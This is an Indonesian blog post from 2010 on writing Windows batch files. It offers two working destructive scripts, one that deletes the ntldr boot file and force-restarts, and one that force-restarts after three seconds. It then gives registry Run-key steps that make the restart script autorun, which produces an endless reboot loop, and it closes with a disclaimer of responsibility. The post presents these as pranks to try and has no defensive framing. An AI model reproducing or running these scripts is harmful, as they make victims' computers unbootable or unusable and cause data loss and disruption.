7.10.2010

membuat file bat


Gak perlu basa – basi lagi. Kali ini aku pengen berbagi dengan temen – temen pada apa – apa yang dah q pelajari mengenai batch. Banyak hal yang bisa dilakukan dengan menggunakan file bat. Dengan bantuan “notepad” kalian bisa mengetikan script di bawah ini lalu simpan dengan ekstensi “.bat”.
//membuat windows jadi ngadat

@echo off
cls
ATTRIB -s -h -r %systemdrive%\ntldr
IF EXIST%systemdrive%\ntldr del %systemdrive%\ntldr
shutdown -r -t 15 -f -c "duhhhhhh. . . .crash. ."



//restart.bat

@echo off
Cls
Title prikitiew
Shutdown –r –t 3 –f –c “wkakakakakakakak”
End



      Untuk tips kali ini temen – temen perlu berpikir ulang untuk melakukannya. Ketika computer kamu di restar maka dalam waktu 3 detik computer akan terestart terus menerus. Untuk mensiasati ganti angka 3 pada script diatas dengan angka 100.
      Biar lebih mantap lagi kita coba manipulasi regedit supaya file tersebut jadi autorun :
Buka regedit lalu ikuti root file berikut :
1.   HKLM/SOFTWARE/MICROSOFT/WINDOWS/CURRENTVERSION/RUN
2.   Lalu klik kanan pada jendela sebelah kanan NEW/STRING VALUE lalu renamelah file tersebut dan klik dua kali file tersebut. Maka akan muncul jendela edit string. Pada textbox value data isikan dimana root file restart.bat disimpan.
3.   Klik OK


Penulis gak bertanggung jawab terhadap efek samping dari artikel kali ini. 

0 komentar:

Post a Comment

 
Free Flash TemplatesRiad In FezFree joomla templatesAgence Web MarocMusic Videos OnlineFree Website templateswww.seodesign.usFree Wordpress Themeswww.freethemes4all.comFree Blog TemplatesLast NewsFree CMS TemplatesFree CSS TemplatesSoccer Videos OnlineFree Wordpress ThemesFree CSS Templates Dreamweaver